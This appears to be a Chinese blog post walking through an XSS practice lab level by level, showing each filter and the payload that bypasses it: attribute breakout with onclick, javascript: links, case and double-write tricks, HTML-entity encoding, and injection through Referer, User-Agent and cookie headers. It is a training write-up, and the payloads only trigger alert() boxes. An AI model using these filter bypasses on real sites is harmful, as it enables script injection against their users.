<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="xss靶场解析, Chenluo">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>xss靶场解析 | Chenluo</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Chenluo" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Chenluo</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Chenluo</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">xss靶场解析</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web/">
                                <span class="chip bg-color">web</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-05-03
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    1.7k
                </div>
                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="xss靶场解析"><a href="#xss靶场解析" class="headerlink" title="xss靶场解析"></a>xss靶场解析</h1><h4 id="第一关"><a href="#第一关" class="headerlink" title="第一关:"></a>第一关:</h4><p>get型xss漏洞</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3ttlry03j30du031weq.jpg" alt="image-20210502092945171"></p>
<ol>
<li><p>根据地址拦确定，提交的参数是name</p>
</li>
<li><p>构造name的payload</p>
<pre class=" language-js"><code class="language-js"><span class="token operator">?</span>name<span class="token operator">=</span><span class="token operator">&lt;</span>script<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3tv9covbj30jz094wf4.jpg" alt="image-20210502093123164"></p>
</li>
<li><p>所以这一关没有进行任何的防护措施</p>
</li>
</ol>
<h4 id="第二关"><a href="#第二关" class="headerlink" title="第二关"></a>第二关</h4><p>很显然这次的注入点应该是在表单里</p>
<ol>
<li>表单是有自己的标签的</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3u05gte3j30p5041t9m.jpg" alt="image-20210502093605691"></p>
<ol start="2">
<li>我们需要先把input标签闭合才能执行我们自己的标签</li>
</ol>
<pre class=" language-js"><code class="language-js">"<span class="token operator">></span><span class="token operator">&lt;</span>script<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3u3e1u50j30rb0efjsr.jpg" alt="image-20210502093912217"></p>
<p><strong>还有另一种方法</strong></p>
<p>既然form有自己的标签，那么我们直接利用标签的属性进行弹窗</p>
<ul>
<li>构造payload</li>
</ul>
<pre class=" language-js"><code class="language-js"><span class="token string">"onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3u8khyyvj30gr0a8aaz.jpg" alt="image-20210502094410387"></p>
<h4 id="第三关"><a href="#第三关" class="headerlink" title="第三关"></a>第三关</h4><p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uclxr89j30x104ogn3.jpg" alt="image-20210502094803444"></p>
<p>很显然这里的‘&lt;’’&gt;’是被编译过的，因此没办法使用标签，那么，就用属性来做了</p>
<p><strong>同样注意到这里value的闭合方式是’’</strong>.</p>
<p>payload</p>
<pre class=" language-js"><code class="language-js"><span class="token string">'onclick='</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uf04jfvj30hj08ymxz.jpg" alt="image-20210502095021729"></p>
<h4 id="第四关"><a href="#第四关" class="headerlink" title="第四关"></a>第四关</h4><p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uhjkvnrj30kn07gt9w.jpg" alt="image-20210502095248422"></p>
<ol>
<li><p>看这里，就很显然，输入的和实际进去的不一样&lt;&gt;全都没了。。。</p>
</li>
<li><p>那么试一下双写,没用。。。。。。。</p>
</li>
<li><p>不搞了，属性试试</p>
</li>
</ol>
<p>payload</p>
<pre class=" language-js"><code class="language-js"><span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3ulmxu9tj30jz0cs0tu.jpg" alt="image-20210502095644563"></p>
<p>所以，本关就是过滤了尖括号</p>
<h4 id="第五关"><a href="#第五关" class="headerlink" title="第五关"></a>第五关</h4><p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uqgmintj30m007bmxr.jpg" alt="image-20210502100122792"></p>
<ol>
<li><p>这次正常的脚本和事件注入，都不行</p>
</li>
<li><p>输入后，看一下源代码</p>
</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3urg789gj30hv05f3zm.jpg" alt="image-20210502100219866"></p>
<p><strong>on变成了o_n</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uscz3zuj30hf04jwfe.jpg" alt="image-20210502100311875"></p>
<p><strong>ri变成了r_i</strong></p>
<p>这两标签不能用了，那用其他的吧</p>
<p>such as:</p>
<pre class=" language-js"><code class="language-js"><span class="token string">">&lt;a href="</span>javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>"
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uuggojkj30kx0a3q3v.jpg" alt="image-20210502100513142"></p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uvd7au5j30dc04074o.jpg" alt="image-20210502100605210"></p>
<p>点击一下图片就会弹窗</p>
<h4 id="第六关"><a href="#第六关" class="headerlink" title="第六关"></a>第六关</h4><p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3uxt73f3j30r6054dh5.jpg" alt="image-20210502100825953"></p>
<ol>
<li>继续用&lt;href&gt;标签试试</li>
</ol>
<p>也没啥用</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3v38zurlj30ls035755.jpg" alt="image-20210502101340299"></p>
<p>太优秀了啊！！！</p>
<ol start="2">
<li>那么试一下大小写</li>
</ol>
<pre class=" language-js"><code class="language-js">"<span class="token operator">></span><span class="token operator">&lt;</span>SCRIPT<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span>SCRIPT<span class="token operator">></span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3vad44elj30q908gt9p.jpg" alt="image-20210502102030375"></p>
<h4 id="第七关"><a href="#第七关" class="headerlink" title="第七关"></a>第七关</h4><ol>
<li>输入</li>
</ol>
<pre class=" language-js"><code class="language-js"><span class="token string">">&lt;script>alert(1)&lt;/script>&lt;"</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3veno3rlj30gv04w0tz.jpg" alt="image-20210502102437575"></p>
<p>直接连script给整没了。。。</p>
<pre class=" language-js"><code class="language-js"><span class="token string">">&lt;href a="</span>javascript<span class="token punctuation">:</span><span class="token function">alert1</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3vgup4vdj30i603m0tm.jpg" alt="image-20210502102644271"></p>
<ol>
<li>根据sql的经验，使用嵌套的方式试试吧</li>
</ol>
<p><strong>字符串里面的script被替换成“=”，但是标签里面的script被替换成空</strong></p>
<pre class=" language-js"><code class="language-js"><span class="token string">">&lt;scrscriptipt>alert(1)&lt;/scrscriptipt>&lt;"</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3vu5tgpvj30lk0bmgmv.jpg" alt="image-20210502103932091"></p>
<p>那么，这里就是双写</p>
<h4 id="第八关"><a href="#第八关" class="headerlink" title="第八关"></a>第八关</h4><ol>
<li><p>输入</p>
<pre class=" language-js"><code class="language-js">a <span class="token operator">=</span> javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre>
</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3w1ar5unj30so08aabp.jpg" alt="image-20210502104623789"></p>
<p>这里又是被转换了。。。</p>
<ol start="2">
<li>如果是</li>
</ol>
<pre class=" language-js"><code class="language-js"><span class="token string">">&lt;href a="</span>javacript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3w8t3qo8j311i066760.jpg" alt="image-20210502105336456"></p>
<p>狠毒啊！！！</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3wa2u7ttj30h40af3zs.jpg" alt="image-20210502105449460"></p>
<ol start="3">
<li>看一下源代码吧。。。</li>
</ol>
<p>这里基本上把能用的标签都转换了，</p>
<ol start="4">
<li>这里还有个函数</li>
</ol>
<pre class=" language-js"><code class="language-js">htmlspecialchars<span class="token punctuation">:</span>

         把预定义的字符 <span class="token string">"&lt;"</span> （小于）和 <span class="token string">">"</span> （大于）转换为 HTML 实体：
</code></pre>
<p><strong>这个函数是把没有经过处理的函数进行html实体编码</strong></p>
<p>尝试先对构造的payload进行html实体解码，再试试</p>
<pre class=" language-js"><code class="language-js">javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

html编码
<span class="token operator">&amp;</span>#x6a<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x61<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x76<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x61<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x73<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x63<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x72<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x69<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x70<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x74<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x3a<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x61<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x6c<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x65<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x72<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x74<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x28<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x31<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x29<span class="token punctuation">;</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3wq8gqh5j30fl08a0u4.jpg" alt="image-20210502111021552"></p>
<h4 id="第九关"><a href="#第九关" class="headerlink" title="第九关"></a>第九关</h4><ol>
<li>继续按第八关的做法，发现不行</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3wtamlnfj312p09mgnv.jpg" alt="image-20210502111317672"></p>
<ol start="2">
<li>看一下源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3wvn97m7j30kg0a2t9w.jpg" alt="image-20210502111533152"></p>
<ol start="3">
<li>他这里做了一下选择</li>
</ol>
<p>意思是，如果语句中有http://才能通过，那么我们加上,同时还要满足脚本语句，尝试把，http加入到alert()里面</p>
<pre class=" language-js"><code class="language-js"><span class="token operator">&amp;</span>#x6a<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x61<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x76<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x61<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x73<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x63<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x72<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x69<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x70<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x74<span class="token punctuation">;</span><span class="token operator">&amp;</span>#x3a<span class="token punctuation">;</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'http://'</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3x46o80hj30r009dta0.jpg" alt="image-20210502112345257"></p>
<p>ok</p>
<h4 id="第10关"><a href="#第10关" class="headerlink" title="第10关"></a>第10关</h4><ol>
<li>没有表单，尝试在url中输入，but，不行</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3x7xac1dj30vw0b3aer.jpg" alt="image-20210502112721206"></p>
<ol start="2">
<li>看一下页面源代码</li>
</ol>
<p>有几个隐藏的标签</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3x8uyatuj30l20b7mz0.jpg" alt="image-20210502112815141"></p>
<ol start="3">
<li>尝试利用这几个隐藏的标签，完成xss</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3xbssk2mj30l5067q3s.jpg" alt="image-20210502113104795"></p>
<p>没反应，看下源代码</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3xdjwitjj30la06hwfv.jpg" alt="image-20210502113246123"></p>
<p>没变化，可能不是这个</p>
<p>换成t_history也没变化</p>
<p>那么就只有t_sort</p>
<pre class=" language-js"><code class="language-js"><span class="token operator">?</span>t_sort<span class="token operator">=</span><span class="token operator">&lt;</span>script<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3xeyn14aj30n104t0tw.jpg" alt="image-20210502113407530"></p>
<p>在这里他把我们所有的&lt;&gt;都搞没了</p>
<p><strong>尝试事件注入吧</strong></p>
<p>由于是隐藏标签，构建payload时：</p>
<pre class=" language-js"><code class="language-js">t_sort<span class="token operator">=</span><span class="token number">2</span><span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token string">" type="</span>text"
</code></pre>
<p>先利用text标签让他显示出来，再点击执行js代码</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq3xx57ojqj30mn09a0wn.jpg" alt="image-20210502115136024"></p>
<h4 id="第11关"><a href="#第11关" class="headerlink" title="第11关"></a>第11关</h4><ol>
<li>看一下源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq4xu0jbwaj30mq08bq4h.jpg" alt="image-20210503083406640"></p>
<ol start="2">
<li>同样是一些隐藏的标签，直接试一下，从t_ref能不能执行注入</li>
</ol>
<p>没啥用，还是在t_sort执行吧</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq4xzkipkbj30m1031mxi.jpg" alt="image-20210503083929798"></p>
<p>还是没用</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq4y0b8w95j30ws06pdhn.jpg" alt="image-20210503084012148"></p>
<p><strong>标签没有被做过任何处理</strong>，但还是没有执行成功，所以，注入点不在这里。。。。</p>
<p>试了几个其他的都没啥用。。。</p>
<ol start="3">
<li>最后看一下源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq4y3n6wvtj30lb09w3zx.jpg" alt="image-20210503084324493"></p>
<p>原来这里获取3个值，t_sort试了不行，那么就只有gttp_referer,这里只做了一个过滤,所以利用bp抓报吧</p>
<p>不让用尖括号，就用属性值！</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq4yeqt5kcj30wm07fmyl.jpg" alt="image-20210503085404180"></p>
<p>注意:</p>
<p>Referer字段必须与上面的字段接着。。。</p>
<pre class=" language-http"><code class="language-http">GET /xss/level11.php HTTP/1.1
<span class="token header-name keyword">Host:</span> 192.168.220.12
<span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
<span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
<span class="token header-name keyword">Accept-Language:</span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
<span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate
<span class="token header-name keyword">Connection:</span> close
<span class="token header-name keyword">Cookie:</span> PHPSESSID=5r7fmn7mb96g512gv1p4jn20b2
<span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1
<span class="token header-name keyword">Pragma:</span> no-cache
<span class="token header-name keyword">Cache-Control:</span> no-cache
<span class="token header-name keyword">Content-Length:</span> 0
<span class="token header-name keyword">Referer:</span>  2" onclick="alert(1)" type="text"
</code></pre>
<ol start="4">
<li>构造payload</li>
</ol>
<pre class=" language-js"><code class="language-js">Referer<span class="token punctuation">:</span> <span class="token number">1</span><span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token string">" type= "</span>text"
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq519qijuqj30kz0b2js9.jpg" alt="image-20210503103303703"></p>
<p>OKK!!</p>
<h4 id="第12关"><a href="#第12关" class="headerlink" title="第12关"></a>第12关</h4><ol>
<li>查看源代码，那么估计处这次的注入点应该是User-Agent</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq51n1abv3j30zf09ggnu.jpg" alt="image-20210503104549806"></p>
<p>那么类似于上一关试一试</p>
<ol start="2">
<li>构造payload</li>
</ol>
<pre class=" language-js"><code class="language-js"><span class="token number">1</span><span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token string">" type="</span>text"
</code></pre>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq51qchvx5j30xy07r75w.jpg" alt="image-20210503104901873"></p>
<ol start="3">
<li>点击一下完成xss</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq51pryhx6j30os0artas.jpg" alt="image-20210503104828286"></p>
<h4 id="第14关"><a href="#第14关" class="headerlink" title="第14关"></a>第14关</h4><ol>
<li>查看源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq51r7yj0mj30r607r0ul.jpg" alt="image-20210503104950911"></p>
<p>这里人家都说了是他，那么，就不尝试其他的了</p>
<ol start="2">
<li>抓包，改cookie</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq51uz9051j30w009276h.jpg" alt="image-20210503105328405"></p>
<p><strong>注意遵循原cookie的格式</strong></p>
<p>这里改变了属性，只要鼠标移上去就会触发</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq51w4qobwj30jn09o3zt.jpg" alt="image-20210503105435511"></p>
<h4 id="第14关-1"><a href="#第14关-1" class="headerlink" title="第14关"></a>第14关</h4><p>不知道干啥</p>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq5208ciabj30q2071q3p.jpg" alt="image-20210503105831766"></p>
<p>源代码，也是啥也没给</p>
<p>估计是啥也不让做，先过了</p>
<h4 id="第15关"><a href="#第15关" class="headerlink" title="第15关"></a>第15关</h4><ol>
<li>查看源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq522hfktlj30uu0adwgo.jpg" alt="image-20210503110041349"></p>
<p>这个东西可以看一下这个教程</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/angularjs/angularjs-directives.html">菜鸟教程</a></p>
<ol start="2">
<li>由于找不到注入点，试一下看看源代码</li>
</ol>
<p><img src="https://tva1.sinaimg.cn/large/008i3skNly1gq52bf1i8ej30nk05wmxs.jpg" alt="image-20210503110916437"></p>
<p>这里找到了注入点</p>
<p>ng-include 指令用于包含外部的 HTML 文件。而且只能包含同一级目录的。</p>
<p>在15关我们可以包含第一关的页面(xss简单) 同时还注意到他对注入的字符串进行了html实体编码</p>
<pre class=" language-js"><code class="language-js"><span class="token operator">?</span>src<span class="token operator">=</span><span class="token string">'level1.php'</span>
</code></pre>
